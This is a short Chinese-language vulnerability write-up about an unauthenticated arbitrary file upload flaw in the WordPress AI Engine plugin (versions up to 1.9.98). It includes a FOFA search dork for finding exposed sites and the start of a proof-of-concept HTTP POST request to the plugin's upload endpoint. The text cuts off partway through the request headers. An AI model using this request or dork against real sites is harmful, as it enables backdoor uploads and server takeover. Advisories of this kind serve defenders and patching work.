0x01 产品简介

AI Engine插件是WordPress中的AI一体化解决方案，包括创建聊天机器人、生成内容和图像、推荐标题和帖子摘录、支持多种人工智能引擎等功能，可以节省用户时间。

0x02 漏洞概述

WordPress AI Engine 插件upload接口存在文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传任意后门文件，执行恶意代码，获取服务器权限。

0x03 影响范围

version <= 1.9.98

0x04 复现环境

FOFA："wp-content/plugins/ai-engine/"

0x05 漏洞复现

PoC

POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Content-Disposition: form-data; filename="test.txt"
Content-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4
C